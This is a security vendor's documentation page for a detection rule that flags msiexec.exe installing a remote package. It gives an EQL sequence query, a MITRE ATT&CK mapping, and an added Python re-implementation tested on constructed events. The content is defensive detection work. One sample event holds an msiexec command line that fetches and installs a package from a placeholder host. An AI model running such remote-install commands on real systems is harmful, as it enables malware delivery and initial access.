IMPORTANT: No additional bug fixes or documentation updates
will be released for this version. For the latest information, see the
current release documentation.
Potential Remote File Execution via MSIEXEC
Identifies the execution of the built-in Windows Installer, msiexec.exe, to install a remote package. Adversaries may abuse msiexec.exe to launch local or network-accessible MSI files.
Rule type: eql
Rule indices:
- logs-endpoint.events.*
Severity: low
Risk score: 21
Runs every: 5m
Searches indices from: now-9m (Date Math format, see also Additional look-back time)
Maximum alerts per execution: 100
References: None
Tags:
- Domain: Endpoint
- OS: Windows
- Use Case: Threat Detection
- Tactic: Initial Access
- Tactic: Defense Evasion
- Data Source: Elastic Defend
Version: 2
Rule authors:
- Elastic
Rule license: Elastic License v2
Rule query
sequence with maxspan=1m
  [process where host.os.type == "windows" and event.action == "start" and
     process.name : "msiexec.exe" and process.args : "/V"] by process.entity_id
  [network where host.os.type == "windows" and process.name : "msiexec.exe" and
     event.action == "connection_attempted"] by process.entity_id
  [process where host.os.type == "windows" and event.action == "start" and
     process.parent.name : "msiexec.exe" and
     user.id : ("S-1-5-21-*", "S-1-5-12-1-*") and
     not process.executable : ("?:\\Windows\\SysWOW64\\msiexec.exe",
                               "?:\\Windows\\System32\\msiexec.exe",
                               "?:\\Windows\\System32\\srtasks.exe",
                               "?:\\Windows\\SysWOW64\\srtasks.exe",
                               "?:\\Windows\\System32\\taskkill.exe",
                               "?:\\Windows\\Installer\\MSI*.tmp",
                               "?:\\Program Files\\*.exe",
                               "?:\\Program Files (x86)\\*.exe",
                               "?:\\Windows\\System32\\ie4uinit.exe",
                               "?:\\Windows\\SysWOW64\\ie4uinit.exe",
                               "?:\\Windows\\System32\\sc.exe",
                               "?:\\Windows\\system32\\Wbem\\mofcomp.exe",
                               "?:\\Windows\\twain_32\\fjscan32\\SOP\\crtdmprc.exe",
                               "?:\\Windows\\SysWOW64\\taskkill.exe",
                               "?:\\Windows\\SysWOW64\\schtasks.exe",
                               "?:\\Windows\\system32\\schtasks.exe",
                               "?:\\Windows\\System32\\sdbinst.exe") and
     not (process.code_signature.subject_name == "Citrix Systems, Inc." and
          process.code_signature.trusted == true) and
     not (process.name : ("regsvr32.exe", "powershell.exe", "rundll32.exe", "wscript.exe") and
          process.Ext.token.integrity_level_name == "high" and
          process.args : ("?:\\Program Files\\*", "?:\\Program Files (x86)\\*")) and
     not (process.executable : ("?:\\Program Files\\*.exe", "?:\\Program Files (x86)\\*.exe") and
          process.code_signature.trusted == true) and
     not (process.name : "rundll32.exe" and process.args : "printui.dll,PrintUIEntry")
  ] by process.parent.entity_id
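To make the three-step sequence concrete, here is an added Python re-implementation of its logic run over constructed endpoint events; it is not Elastic's code. Field names mirror the rule, but the host, entity ids, file paths and user SID are made up, and only a subset of the rule's child-process exclusion list is reproduced.

```python
from fnmatch import fnmatch

MAXSPAN = 60  # seconds, the rule's "maxspan=1m"
EXCLUDED_CHILDREN = (  # subset of the rule's excluded child paths, as EQL-style globs
    "?:\\Windows\\System32\\msiexec.exe", "?:\\Windows\\SysWOW64\\msiexec.exe",
    "?:\\Windows\\Installer\\MSI*.tmp", "?:\\Program Files\\*.exe")
def excluded(path):
    # EQL ':' matching is case-insensitive; its '?' and '*' map directly onto fnmatch.
    return any(fnmatch(path.lower(), pat.lower()) for pat in EXCLUDED_CHILDREN)
def is_msiexec(ev):
    return ev["host.os.type"] == "windows" and ev["process.name"].lower() == "msiexec.exe"

def find_sequences(events):
    """Return [(msiexec entity_id, child executable)] for each ordered three-step match."""
    events = sorted(events, key=lambda e: e["@timestamp"])
    hits = []
    for s in events:  # step 1: msiexec start with /V on its command line
        if not (s["event.category"] == "process" and s["event.action"] == "start"
                and is_msiexec(s) and "/V" in s["process.args"]):
            continue
        eid, deadline = s["process.entity_id"], s["@timestamp"] + MAXSPAN
        seen_net = False
        for e in events:
            if not s["@timestamp"] <= e["@timestamp"] <= deadline:
                continue  # outside maxspan, so it cannot join this sequence
            if (e["event.category"] == "network" and is_msiexec(e)
                    and e["event.action"] == "connection_attempted"
                    and e["process.entity_id"] == eid):
                seen_net = True  # step 2: the same msiexec process reached out to the network
            elif (seen_net and e["event.category"] == "process" and e["event.action"] == "start"
                  and e.get("process.parent.entity_id") == eid
                  and e["user.id"].startswith(("S-1-5-21-", "S-1-5-12-1-"))
                  and not excluded(e["process.executable"])):
                hits.append((eid, e["process.executable"]))  # step 3: unexpected child
    return hits

def ev(ts, category, action, **fields):  # flat ECS-style event from one Windows host
    return {"@timestamp": ts, "host.os.type": "windows", "event.category": category,
            "event.action": action, **fields}
T = 1_700_000_000  # constructed base time (epoch seconds)
SAMPLE = [  # constructed events, not real telemetry
    ev(T, "process", "start", **{"process.name": "msiexec.exe", "process.entity_id": "msi-1",
       "process.args": ["msiexec.exe", "/V", "http://example.invalid/pkg.msi"], "user.id": "S-1-5-21-1000"}),
    ev(T + 2, "network", "connection_attempted", **{"process.name": "msiexec.exe", "process.entity_id": "msi-1"}),
    ev(T + 5, "process", "start", **{"process.name": "MSI1234.tmp", "process.parent.entity_id": "msi-1",
       "process.executable": "C:\\Windows\\Installer\\MSI1234.tmp", "user.id": "S-1-5-21-1000"}),  # excluded
    ev(T + 20, "process", "start", **{"process.name": "setup.exe", "process.parent.entity_id": "msi-1",
       "process.executable": "C:\\Users\\alice\\AppData\\Local\\Temp\\setup.exe", "user.id": "S-1-5-21-1000"}),  # fires
]
```

Running `find_sequences(SAMPLE)` yields one hit for the Temp-folder child; drop the network event or push the child past the 60-second window and the sequence no longer completes, which is the behaviour to keep in mind when tuning exclusions.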
Framework: MITRE ATT&CK™
- Tactic:
  - Name: Initial Access
  - ID: TA0001
  - Reference URL: https://attack.mitre.org/tactics/TA0001/
- Technique:
  - Name: Phishing
  - ID: T1566
  - Reference URL: https://attack.mitre.org/techniques/T1566/
- Sub-technique:
  - Name: Spearphishing Link
  - ID: T1566.002
  - Reference URL: https://attack.mitre.org/techniques/T1566/002/
- Tactic:
  - Name: Defense Evasion
  - ID: TA0005
  - Reference URL: https://attack.mitre.org/tactics/TA0005/
- Technique:
  - Name: System Binary Proxy Execution
  - ID: T1218
  - Reference URL: https://attack.mitre.org/techniques/T1218/
- Sub-technique:
  - Name: Msiexec
  - ID: T1218.007
  - Reference URL: https://attack.mitre.org/techniques/T1218/007/